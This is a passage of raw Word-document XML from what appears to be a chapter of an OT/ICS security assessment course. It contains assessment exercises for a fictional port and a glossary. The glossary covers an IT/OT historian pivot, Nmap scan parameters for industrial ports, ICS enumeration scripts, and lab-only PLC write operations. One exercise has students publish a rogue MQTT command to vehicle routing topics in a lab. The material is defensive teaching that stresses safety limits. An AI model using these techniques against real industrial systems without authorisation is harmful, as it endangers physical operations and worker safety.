NOT do; and the timestamp and session termination confirmation.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Active Assessment in Safety-Critical OT Environments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graduated active assessment model — four levels from authenticated review through CJA demonstration — is an intellectually coherent framework but a practical compromise that systematically understates OT security risk. By stopping at Level 4 (demonstrating access without completing the attack), the assessment team produces a finding that says 'we could reach the SIS' rather than 'we could defeat the SIS ESD function'. A client who reads the former may understand the technical finding but will not feel the operational consequence. A client who experiences a simulated SIS ESD defeat in a safe, controlled shutdown scenario would understand in their bones why the architectural gap must be fixed today. The graduated model's conservatism is professionally defensible but organisationally ineffective.'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Assess the strongest form of the argument: in what specific way does the graduated model's stopping point limitation prevent an OT assessment from communicating the full operational consequence of a security finding to the stakeholders who must act on it?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Examine the technical and legal counterarguments: why is the CJA access demonstration stopping point not merely a safety constraint but actually the most credible evidence that can be produced — and why would a client's board respond more to 'attack path demonstrated' than to 'attack simulated to completion'?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Explore the middle ground: what specific techniques — beyond network connectivity demonstrations — can an OT assessment team use to communicate the physical operational consequence of a finding without completing the attack? How do lab-based capability demonstrations, consequence analysis documentation, and peer incident references contribute to this communication?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Conclusion: what is the correct balance between assessment rigour and operational safety in a mature OT assessment programme, and how should this balance shift as the client's OT security maturity develops over multiple assessment cycles?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Complete Active Assessment for Pacific Gateway Port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CJA register and passive assessment findings established in Chapters 12 and 14 for Pacific Gateway Port, design and execute (in lab or simulation) a complete active assessment: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Design the active assessment plan for CJA-PGP-001 (IGV navigation system) and CJA-PGP-002 (Fleet Management Server MQTT). For each CJA: select the assessment level (1–4); specify the tools with full OT safety evaluation; define the stopping point; and identify the evidence that will be collected.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Execute the MQTT unauthenticated access assessment for CJA-PGP-002 in the lab environment. Demonstrate that: (a) the MQTT broker is accessible without authentication; (b) all IGV position and routing topics can be subscribed to; (c) a rogue command message can be published (in lab only — document the command that would be published in production). Produce complete finding documentation.</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Pacific Gateway Port assessment has produced the following finding: 'MQTT broker accessible without authentication — all IGV routing messages visible and writable.' The Operations Manager's response is: 'Our IGVs have a hard-wired e-stop that workers can use if something goes wrong. The cyber risk is acceptable because the physical safety system is in place.' Evaluate this risk acceptance argument using the ALARP framework from Chapter 5 and the CJA consequence analysis from Chapter 3. Is this a valid ALARP justification? What additional evidence from the active assessment would you present to challenge or support this argument?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Produce the integrated active assessment finding register for Pacific Gateway Port, integrating passive findings (Chapter 14) with active confirmations, severity ratings, kill chain stage mappings, and active assessment status for each finding.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15</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CJA Access Demonstration: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">A Level 4 active assessment technique that proves a Crown Jewel Asset can be reached and accessed via the scenario attack path, without executing the final step that would cause physical consequence. Provides maximum finding impact while preserving operational safety.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Default Credential Assessment: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">A structured assessment of whether OT devices are using factory default credentials, conducted with rate limiting and strict attempt limits to avoid triggering account lockout (a DoS condition). Uses a vendor-specific reference list of known default credentials rather than brute force.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Graduated Active Assessment Model: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">A four-level escalation model for active OT assessment: Level 1 (authenticated review — no unsolicited traffic), Level 2 (OT-safe discovery — minimal, protocol-compliant traffic), Level 3 (vulnerability validation — proof-of-concept without exploitation), Level 4 (CJA access demonstration — full attack path with defined stopping point).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Historian Pivot: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">An IT/OT attack path that exploits the dual-network connectivity of a SCADA historian — its connection to both corporate IT (for reporting) and OT networks (for process data collection) — to traverse the IT/OT boundary without traversing a controlled conduit.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Lateral Movement Simulation: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">An active assessment technique that demonstrates the attack path from an assumed IT foothold through the IT/OT boundary to an OT Crown Jewel Asset, using authorised credentials and techniques identified in the kill chain scenario, stopping at the defined CJA demonstration stopping point.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Nmap OT-Safe Profile: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">A specific Nmap parameter set safe for use against OT networks: -sV --version-intensity 0 -T2 --max-rate 50 -Pn -n, with OT-specific port list (-p 102,502,20000,44818,4840,47808). Do NOT substitute -T3, -T4, or -T5. Lab-validate against target firmware before production use.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Tooling Safety Evaluation Framework: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">A six-question evaluation applied to every active assessment tool before deployment against production OT devices: Q1 (traffic volume), Q2 (protocol compliance), Q3 (target compatibility), Q4 (reversibility), Q5 (passive alternative), Q6 (lab validation). Classifies tools as SAFE, CAUTION, DANGEROUS, or EXPERT-ONLY for specific target.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Protocol Exploitation (Lab Only): </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Techniques using industrial protocol clients (pymodbus, pycomm3, python-snap7) to perform write operations against PLCs — demonstrating the attack capability that unauthenticated OT protocol access enables. Used in dedicated lab environments only; never against production systems.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Redpoint NSE Scripts: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">A collection of Nmap NSE (Nmap Scripting Engine) scripts for ICS protocol-specific device identification and enumeration. Key scripts: enip-info (EtherNet/IP/Allen-Bradley), modbus-discover (Modbus), s7-info (Siemens S7), dnp3-info (DNP3).</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Segmentation Validation: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Active confirmation that zone and conduit architecture is correctly implemented — testing whether zone boundary firewalls enforce the intended protocol restrictions and whether unapproved cross-zone access is blocked. Frequently reveals discrepancies between documented and actual architecture.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Stopping Point: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The specific technical action at which the assessment team halts during a CJA demonstration — chosen to provide unambiguous evidence of attack path access while causing zero operational risk. Must be documented precisely, with timestamp and session termination confirmation.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 Boundary Testing: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">A Level 2 active assessment technique that tests zone boundary firewalls and conduit policy enforcement from authorised positions in adjacent zones, using protocol-specific connection attempts to confirm which protocols and ports are correctly blocked and which are unexpectedly open.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15</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Proceed to Chapter 16: Assessment Reporting and CSMS Integration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15: Active Assessment Techniques and Tool Safety</w:t>
    </w:r>
    <w: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Active Assessment Techniques and Tool Safety</dc:title>
  <dc:creator>OT Security Assessment Expert — Risk Analysis and Assessment</dc:creator>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-12T11:22:29.357Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-12T11:22:29.379Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>